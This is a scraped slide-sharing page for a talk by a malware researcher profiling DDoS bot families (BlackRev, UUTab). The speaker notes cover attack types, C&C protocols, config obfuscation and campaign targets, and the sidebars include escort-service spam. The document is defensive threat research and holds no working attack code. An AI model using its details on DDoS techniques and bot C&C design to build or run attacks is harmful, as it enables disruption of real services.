Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriAdli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriBGA Cyber Security
 
Özgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS EngellemeÖzgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS EngellemeBGA Cyber Security
 
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriTemel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriBGA Cyber Security
 
Surviving A DDoS Attack: Securing CDN Traffic at CloudFlare
Surviving A DDoS Attack: Securing CDN Traffic at CloudFlareSurviving A DDoS Attack: Securing CDN Traffic at CloudFlare
Surviving A DDoS Attack: Securing CDN Traffic at CloudFlareCloudflare
 
DDoS Attacks and Countermeasures
DDoS Attacks and CountermeasuresDDoS Attacks and Countermeasures
DDoS Attacks and Countermeasuresthaidn
 

Viewers also liked (18)

HKNOG 1.0 - DDoS attacks in an IPv6 World
HKNOG 1.0 -  DDoS attacks in an IPv6 WorldHKNOG 1.0 -  DDoS attacks in an IPv6 World
HKNOG 1.0 - DDoS attacks in an IPv6 World
 
An Inside Look at a Sophisticated, Multi-vector DDoS Attack
An Inside Look at a Sophisticated, Multi-vector DDoS AttackAn Inside Look at a Sophisticated, Multi-vector DDoS Attack
An Inside Look at a Sophisticated, Multi-vector DDoS Attack
 
DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...
DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...
DDoS Open Threat Signaling (DOTS) Working Group Presentation on draft-ietf-do...
 
Preparing for the Imminent Terabit DDoS Attack
Preparing for the Imminent Terabit DDoS AttackPreparing for the Imminent Terabit DDoS Attack
Preparing for the Imminent Terabit DDoS Attack
 
How to launch and defend against a DDoS
How to launch and defend against a DDoSHow to launch and defend against a DDoS
How to launch and defend against a DDoS
 
DDoS detection at small ISP by Wardner Maia
DDoS detection at small ISP by Wardner MaiaDDoS detection at small ISP by Wardner Maia
DDoS detection at small ISP by Wardner Maia
 
Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)Ddos and mitigation methods.pptx (1)
Ddos and mitigation methods.pptx (1)
 
Practical steps to mitigate DDoS attacks
Practical steps to mitigate DDoS attacksPractical steps to mitigate DDoS attacks
Practical steps to mitigate DDoS attacks
 
Bonnes pratiques anti-DDOS
Bonnes pratiques anti-DDOSBonnes pratiques anti-DDOS
Bonnes pratiques anti-DDOS
 
Dağıtık Servis Dışı Bırakma Saldırıları
Dağıtık Servis Dışı Bırakma SaldırılarıDağıtık Servis Dışı Bırakma Saldırıları
Dağıtık Servis Dışı Bırakma Saldırıları
 
(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS Attacks(SEC306) Defending Against DDoS Attacks
(SEC306) Defending Against DDoS Attacks
 
DoS DDoS Saldırıları ve Korunma Yöntemleri Kitabı
DoS DDoS Saldırıları ve Korunma Yöntemleri KitabıDoS DDoS Saldırıları ve Korunma Yöntemleri Kitabı
DoS DDoS Saldırıları ve Korunma Yöntemleri Kitabı
 
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriAdli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
 
Syn Flood DDoS Saldırıları
Syn Flood DDoS SaldırılarıSyn Flood DDoS Saldırıları
Syn Flood DDoS Saldırıları
 
Özgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS EngellemeÖzgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS Engelleme
 
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriTemel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
 
Surviving A DDoS Attack: Securing CDN Traffic at CloudFlare
Surviving A DDoS Attack: Securing CDN Traffic at CloudFlareSurviving A DDoS Attack: Securing CDN Traffic at CloudFlare
Surviving A DDoS Attack: Securing CDN Traffic at CloudFlare
 
DDoS Attacks and Countermeasures
DDoS Attacks and CountermeasuresDDoS Attacks and Countermeasures
DDoS Attacks and Countermeasures
 

Similar to ASERT's DDoS Malware Corral, Volume 2

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
DDoS Attacks - Scenery, Evolution and Mitigation
DDoS Attacks - Scenery, Evolution and MitigationDDoS Attacks - Scenery, Evolution and Mitigation
DDoS Attacks - Scenery, Evolution and MitigationWilson Rogerio Lopes
 
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"StHack
 
Travelling to the far side of Andromeda
Travelling to the far side of AndromedaTravelling to the far side of Andromeda
Travelling to the far side of AndromedaJose Miguel Esparza
 
Common Browser Hijacking Methods
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking MethodsDavid Barroso
 
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Peter Kálnai
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You ThinkHITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You ThinkHacks in Taiwan (HITCON)
 
Ad, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniquesAd, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniquesGuglielmo Scaiola
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3Nick Sullivan
 
Drilling Down Into DNS DDoS
Drilling Down Into DNS DDoSDrilling Down Into DNS DDoS
Drilling Down Into DNS DDoSAPNIC
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
DNS Security Threats and Solutions
DNS Security Threats and SolutionsDNS Security Threats and Solutions
DNS Security Threats and SolutionsInnoTech
 

Similar to ASERT's DDoS Malware Corral, Volume 2 (20)

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
 
DDoS Attacks - Scenery, Evolution and Mitigation
DDoS Attacks - Scenery, Evolution and MitigationDDoS Attacks - Scenery, Evolution and Mitigation
DDoS Attacks - Scenery, Evolution and Mitigation
 
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"
 
Travelling to the far side of Andromeda
Travelling to the far side of AndromedaTravelling to the far side of Andromeda
Travelling to the far side of Andromeda
 
Common Browser Hijacking Methods
Common Browser Hijacking MethodsCommon Browser Hijacking Methods
Common Browser Hijacking Methods
 
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
Virus Bulletin 2018: Lazarus Group a mahjong game played with different sets ...
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You ThinkHITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
HITCON FreeTalk 2022 - Defeat 0day is not as Difficult as You Think
 
Ad, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniquesAd, mimikatz, ata and (awe)some evasion techniques
Ad, mimikatz, ata and (awe)some evasion techniques
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
NPTs
NPTsNPTs
NPTs
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
snort.ppt
snort.pptsnort.ppt
snort.ppt
 
Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3Heartache and Heartbleed - 31c3
Heartache and Heartbleed - 31c3
 
Drilling Down Into DNS DDoS
Drilling Down Into DNS DDoSDrilling Down Into DNS DDoS
Drilling Down Into DNS DDoS
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
DNS Security Threats and Solutions
DNS Security Threats and SolutionsDNS Security Threats and Solutions
DNS Security Threats and Solutions
 

Recently uploaded

Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Deliverybabeytanya
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girladitipandeya
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...Diya Sharma
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneCall girls in Ahmedabad High profile
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Delhi Call girls
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirtrahman018755
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 

Recently uploaded (20)

Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on DeliveryCall Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
Call Girls In Mumbai Central Mumbai ❤️ 9920874524 👈 Cash on Delivery
 
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service ThaneRussian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
Russian Call Girls Thane Swara 8617697112 Independent Escort Service Thane
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 

ASERT's DDoS Malware Corral, Volume 2

Editor's Notes

  1. Good morning, today I’m going to share some research from ASERT’s DDoS Malware Corral.ASERT is Arbor Network’s malware research teamAnd this presentation is our second “state of the union of DDoS malware”, if you will.If interested, the slides for our first volume, presented last year, can be found online under the same title.
  2. This is what I’ll be covering. First, who I amSecond, what is mcorralFollowed by a really quick primer on DDoS so that we’re on the same pageThen, I’ll get into the details of the malwaresAnd I’ll finish with some trends and takeaways
  3. My name is Dennis Schwarzand I’m a malware researcher.
  4. What is mcorral ?Mcorral is our malware collection, storage, and processing system.We’re on our second generation now and started transitioning to it in the middle of 2013.The first generation system definitely served its purpose, but we decided to take the best features of it and re-implement it as a much more dynamic and configurable platform.We also have a dedicated dev-team now to keep up with the researchers “wish lists”. This allows researchers to focus on malware instead of taking time off to implement a new feature
  5. Metaphoricallymcorral looks like thisLike a bunch of horses in a horse corral
  6. Visually, it looks like this.This is a screenshot of part of the researcher’s primary user interface
  7. And, logically it looks like thisMalware comes inIt’s prioritized and ran through our sandboxenThe results are post-processed and organizedAnd finally, out comes (hopefully) actionable items for various consumers
  8. After mcorral and the researchers do their business, we get DDoS malwareHere’s a samplingWe actually get much more than just DDoS related malware, but for now we’ll gloss over thathttp://worditout.com
  9. Before getting into the malware, I wanted to give a real quick overview of DDoSThe attacks on this slide are what I would consider the “basic suite” of attacksThey pretty much do what they sayImplementation-wise,TCP syn floods are usually implemented as Connect floods. This is due to the ease of calling the Connect function and restrictions on raw sockets in WindowsAnd the HTTP attacks are differentiated by their headers and header content
  10. These are what I would consider the “Layer 7” suite.Slowlorisopens several web sessions to the target and holds them open for as long as possible, dribbling out bytesARME or Apache Remote Memory Exhaustion or Apache Killer, sends a crazy Range header that mucks up older version of ApacheRUDY or R-U-Dead-Yet sends an endless stream of POST dataAnd DNS refers to DNS protocol aware attacks
  11. Another suite of attacks are the reflection and amplification attacks. Here are some of the common services that allow for thisThe port 19 chargen service is the grandfather of amplification attacksDNS amplification, of course, took down Spamhaus in early 2013 to a lot of pressAnd NTP amplification has been in the spot light recently: the January attack on major gaming networks and the February attack being pegged as the largest Internet DDoS attack seen so farSNMP has a few amplification/reflection avenues as well, so it wouldn’t surprise me if it’s the next big news maker…
  12. Every DDoS talk needs to mention “booter” sites, so here that slid.This is a screenshot of twbooter, the service used to take down Brain Kreb’s website in early 2013 and was followed by a “swatting” attack on his houseThese types of booter sites are everywhere and have been around for a long timeThey are used a lot in the gaming worlds to boot off other gamersand also used between conflicting/competing booter sites, hacking forums, and other hacking “clicks”
  13. Now, on to the malware. Why did I choose to share the following families?First, DDoS is Arbor Network’s bread and butter so I spend a good deal of my time on DDoS malware.Second, part of the post-processing/output done by mcorral bubbles up potentially new and interesting samples for humans to look at, so a lot of these came from that pileThird, these families are certainly less well known than for example Brobot, Dirtjumper, etc.But, with that, most of the associated campaigns are smaller and that allows me to get a more complete picture of themThese families were also mostly active in the wild when I start looking at them which is always a nice benefit.Lastly, these are some of the malware families that I’ve personally reverse engineered and tracked so they’re a bit like my pet malware
  14. First up on my list is Trojan.BlackRev.I wrote about this family in a blog post released last year, but I wanted to talked about it here because it shows what I consider a complete life cycle of a malware family
  15. It was born circa March 2013
  16. It is Russian in origin. This isn’t a big surprise as Russia is a major DDoS playerSource: http://en.wikipedia.org/wiki/File:Russian_Federation_(orthographic_projection).svg
  17. It’s written in DelphiAlso not a big surprise as Russian malware coders love DelphiI have a personal theory that either Russian computer science programs are still teaching Delphi programming, or that’s what the language of choice was when the current generation of Russian DDoS coders were going through school.
  18. I got its name from a mutex that it creates on an infected systemHere’s an IDA screenshot of that code
  19. It’s full name is actually “Black Revolution” as can been seen in this panel screenshotThis panel isn’t very fancy, just basic and to the point.
  20. Some of the forums thatblackrev was being advertised in was:Shopworld.biz – a Russian language forumAndElite hack forums – an English language forumHere is the advert for the latter
  21. Pricing was in WebMoney’s WMZ currency. WMZ is WebMoney’s USD equivalentSo selling for a few hundred dollars
  22. The author was someone going by the handle “silence’.Here is a thread on shopworld.biz where he claims blackrev as his own.When I was originally looking at blackrev, there wasn’t much attribution on silence besides an ICQ number.
  23. But, following up for this talk… it looks like in December 2013 silence upset somebody and they decided to “dox” him.Take it with a grain of salt though… it’s as accurate as any other “doxing”
  24. On to the C&C.This is what blackrev’s C&C phone home looks like on the wireA standard HTTP GET based C&C protocol.These types of protocols are great because it’s easy to do a inurl search for new C&C hosts
  25. This is what the command polling looks like
  26. Here are the attack related commands. There are certainly a bunch of them.These are all from the basic suite of DDoS attacksHTTP floodsTCP floodsUDP floodsEtc.
  27. During it’s lifetime, I was able to track 6 distinct C&C hostsHere they are on a google map@NO_UPDATE
  28. Here are the attack commands sent from these C&CsAn HTTP GET flood was the most popular@NO_UPDATEmalware=> \o blackrev_cmdsmalware=> select cmd from ddos_commands where cc_channel='blackrev';malware=> \ocut -d "|" -f 1 blackrev_cmds | sort | uniq -c | sort -nr
  29. These were the targeted countries based on geo IP.Russia and the UK being the most targeted@NO_UPDATEselect target_cc, count(*) from ddos_commands where cc_channel='blackrev' group by target_cc order by count(*) desc;
  30. And these were some of the targets observedThese sites resolve into the following categories:PornCompeting DDoS/booter servicesHacking sitesDrug marketplaceScripting siteAd siteConstruction companyCarding forum@NO_UPDATEWorditout.com
  31. As mentioned at the start, this is the life cycle of blackrevSo circa June 2013 about 3 months after its release, silence decided to sell the projectAnd this effectively kills off blackrev as we haven’t seen any new samples since.
  32. To further validate it’s death, in October 2013, someone leaked it’s source code on a public forum.I want to say this is the “fuckav” forum, but I’m not 100% sure on that.Google translate wasn’t doing a great job with this URL, but it essentially says “blackrev source code”
  33. Just to verify, I downloaded the leaked codeAnd tracked down the CreateMutex function in the Delphi code that we saw earlier in the IDA screenshotSo far, I haven’t come across any blackrev code forks or variantsThat was the life and death of Trojan.Blackrev
  34. Next up is the “The APT” or Trojan.UUTab
  35. UUtab was first seen circa May 2013
  36. I of course say “APT” because it is Chinese in origin.Chinese DDoS bots aren’t a big surprise as China is also a major DDoS playerSource: http://en.wikipedia.org/wiki/File:People%27s_Republic_of_China_(orthographic_projection).svg
  37. It is written in C++
  38. AndIt’s name comes from a piece of its C&C phone home. The “magic number” if you will.This is an IDA screenshot of the “send phone home” function and we can see the Uutab in the middle strcpy call
  39. The C&C host details are obfuscated in the binary using an XOR with a 126 digit hardcoded keyThis Python function can be used to decrypt it
  40. This IDA screenshot shows the decryption in action
  41. The C&C protocol is what we call a binstruct.Binstruct is essentially a C structure with a mixture of ASCII and binary data members and a fixed length sent over the wireUutab comes in a 516 or a 1028 byte flavorThis slide shows the former.
  42. This is what thebinstruct looks like on the wire
  43. This is what the 516 byte C&C response looks likeAgain a binstruct.The paramsstruct defines the DDoS target host, port, timing, number of threads, etc.
